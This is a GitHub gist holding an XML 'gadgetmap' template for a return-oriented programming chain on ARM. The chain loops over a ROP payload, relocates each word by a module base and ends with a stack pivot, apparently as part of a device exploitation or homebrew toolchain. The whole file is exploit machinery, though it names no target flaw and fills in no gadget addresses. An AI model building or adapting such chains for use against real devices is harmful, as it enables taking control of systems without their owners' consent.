Skip to content

Instantly share code, notes, and snippets.

@xyzz

xyzz/relocate_rop.xml Secret

Created August 27, 2016 17:53
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xyzz/606eaf162059b1ea53137bd356c0570d to your computer and use it in GitHub Desktop.
Save xyzz/606eaf162059b1ea53137bd356c0570d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
relocate_rop.xml
<?xml version="1.0"?>
<!--
arguments:
ARG0 = &index
ARG1 = 4 * rop_size_words
ARG2 = &rop_base
ARG3 = bases_base
ARG4 = &stored
ARG5 = rop_size_words
-->
<gadgetmap>
<function>relocate_rop</function>
<regex>relocate_rop(\(vvvvvv\))</regex>
<stack>
<!-- r0 = [index] -->
<data>GADGET_ADDRESS(pop_r0_pc)</data>
<data>ARG0</data> <!-- R0 -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += 4 * rop_size_words -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG1</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += [rop_base] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG2</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [rop_base] -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = ldrb[r0] * 4 -->
<data>GADGET_ADDRESS(ldrb_r0_r0_pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(lsls_r0_2-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += bases_base -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG3</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = ldr[r0] -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- [stored] = r0 -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(str_r0_r1-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = [index] * 4 -->
<data>GADGET_ADDRESS(pop_r0_pc)</data>
<data>ARG0</data> <!-- R0 -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(lsls_r0_2-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += [rop_base] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG2</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [rop_base] -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = [r0] -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += [stored] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [rop_base] -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- [stored] = r0 -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(str_r0_r1-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = [index] * 4 -->
<data>GADGET_ADDRESS(pop_r0_pc)</data>
<data>ARG0</data> <!-- R0 -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(lsls_r0_2-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += [rop_base] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG2</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [rop_base] -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- [r0] = [stored] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [stored] -->
<data>GADGET_ADDRESS(str_r1_r0-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- [index] += 1 -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>1</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r0_pc)</data>
<data>ARG0</data> <!-- R0 -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG0</data> <!-- R1 -->
<data>GADGET_ADDRESS(str_r0_r1-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- cmp [index], rop_size_words -->
<data>GADGET_ADDRESS(pop_r0_pc)</data> <!-- PC -->
<data>ARG0</data> <!-- R0 -->
<data>GADGET_ADDRESS(ldr_r0_r0-pop_r4_pc)</data> <!-- PC -->
<data>ARG5</data> <!-- R4 -->
<data>GADGET_ADDRESS(cmp_r0_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<!-- r0 += -1 -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>0xFFFFFFFF</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- now R0 == 0 if [index] == rop_size_words, -1 otherwise -->
<!-- set R0 = sp offset if continue to loop, 0 if exiting rop chain -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>692</data> <!-- R1 --> <!-- = +(number of |data| before RETURN) * 4 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(mul_r0_r1-bx_lr)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- store R0 to stored tmp mem -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(str_r0_r1-pop_r4)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 = sp -->
<data>GADGET_ADDRESS(pop_r2_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- R2 -->
<data>GADGET_ADDRESS(mov_r0_sp-blx_r2)</data> <!-- PC -->
<!-- r0 += [stored] -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>ARG4</data> <!-- R1 -->
<data>GADGET_ADDRESS(pop_r5_r6_r7_r8_sb_pc)</data> <!-- PC -->
<data>0</data> <!-- R5 -->
<data>0</data> <!-- R6 -->
<data>0</data> <!-- R7 -->
<data>0</data> <!-- R8 -->
<data>GADGET_ADDRESS(pop_pc)</data> <!-- SB -->
<data>GADGET_ADDRESS(ldr_r1_r1-blx_sb)</data> <!-- PC --> <!-- r1 = [stored] -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- r0 += const -->
<data>GADGET_ADDRESS(pop_r1_pc)</data> <!-- PC -->
<data>100</data> <!-- R1 --> <!-- = (number of |data| after mov_r0_sp-blx_r2 and before RETURN_ADDRESS) * 4 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(adds_r0_r1)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<!-- now r0 contains SP, implementing the IF, and we need to pivot to it -->
<!-- r12 = r0 -->
<data>GADGET_ADDRESS(pop_r4_pc)</data> <!-- PC -->
<data>GADGET_ADDRESS(mov_r12_r0)</data> <!-- R4 -->
<data>GADGET_ADDRESS(blx_r4-pop_r4_pc)</data> <!-- PC -->
<data>0</data> <!-- R4 -->
<data>GADGET_ADDRESS(mov_sp_r12-pop_pc)</data> <!-- PC -->
<!-- only get here when the loop is complete -->
<data>RETURN_ADDRESS</data>
</stack>
</gadgetmap>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment